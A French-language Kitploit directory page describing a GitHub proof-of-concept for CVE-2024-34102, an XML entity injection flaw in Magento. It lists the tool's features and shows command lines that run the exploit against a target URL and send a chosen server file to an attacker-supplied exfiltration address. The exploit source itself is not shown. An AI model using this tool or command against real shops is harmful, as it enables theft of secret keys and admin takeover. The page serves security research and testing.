Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-34102 — Une démonstration PoC , vulnérabilité critique d'injection d'entités XML dans Magento | Kitploit
Outils/GitHubGitHub/d0rb/cve-2024-34102
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et Éducation
GitHubd0rb/cve-2024-34102

CVE-2024-34102

Une démonstration PoC , vulnérabilité critique d'injection d'entités XML dans Magento

Voir le dépôt
2il y a 2 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

🇮🇱 #BringThemHome #NeverAgainIsNow 🇮🇱

Nous exigeons le retour en toute sécurité de tous les citoyens pris en otage par le groupe terroriste Hamas. Nous ne nous reposerons pas tant que chaque otage n'aura pas été libéré et ne sera pas rentré chez lui en sécurité. Vous pouvez aider à les ramener chez eux. https://stories.bringthemhomenow.net/

PoC pour CVE-2024-34102 🚀

Ce dépôt contient une preuve de concept (PoC) de l'exploit pour la vulnérabilité critique d'injection d'entités XML (CVE-2024-34102) dans Magento. Cette vulnérabilité permet l'exfiltration de fichiers sensibles, qui peut ensuite être exploitée pour obtenir un accès non autorisé aux fonctionnalités administratives de Magento. Cet exploit est conçu à des fins éducatives et doit être utilisé de manière responsable.

Aperçu 📖

Magento est l'une des solutions e-commerce les plus populaires utilisées dans le monde. En juin 2024, un problème critique d'injection d'entités XML sans authentification a été découvert, identifié sous le nom CVE-2024-34102. Cette vulnérabilité peut entraîner des conséquences graves, notamment l'exfiltration du fichier app/etc/env.php de Magento, qui contient les clés cryptographiques utilisées pour signer les JWT.

Fonctionnalités 🌟

  • Exfiltrer des fichiers sensibles depuis une instance Magento vulnérable.
  • Utilisation simple et directe.
  • Démonstration éducative de l'injection d'entités XML.

Utilisation 🚀

Prérequis

  • Python 3.x
  • Bibliothèque requests (pip install requests)

Exécution de l'exploit

  1. Clonez le dépôt :

    root@kitploit:~
    git clone https://github.com/yourusername/CVE-2024-34102-exploit.git
    cd CVE-2024-34102-exploit
    
  2. Exécutez le script avec les arguments nécessaires :

    root@kitploit:~
    python cve_2024_34102_exploit.py --target-url http://example.com --target-file /etc/hosts --exfil-url your_ip:9999
    

Arguments de la ligne de commande

  • --target-url : L'URL de l'instance Magento cible.
  • --target-file : Le chemin du fichier sur le serveur cible à exfiltrer.
  • --exfil-url : L'URL pour recevoir les données exfiltrées.

Exemple 🌐

root@kitploit:~
python cve_2024_34102_exploit.py --target-url http://example.com --target-file /etc/hosts --exfil-url your_ip:9999
Télécharger l’outil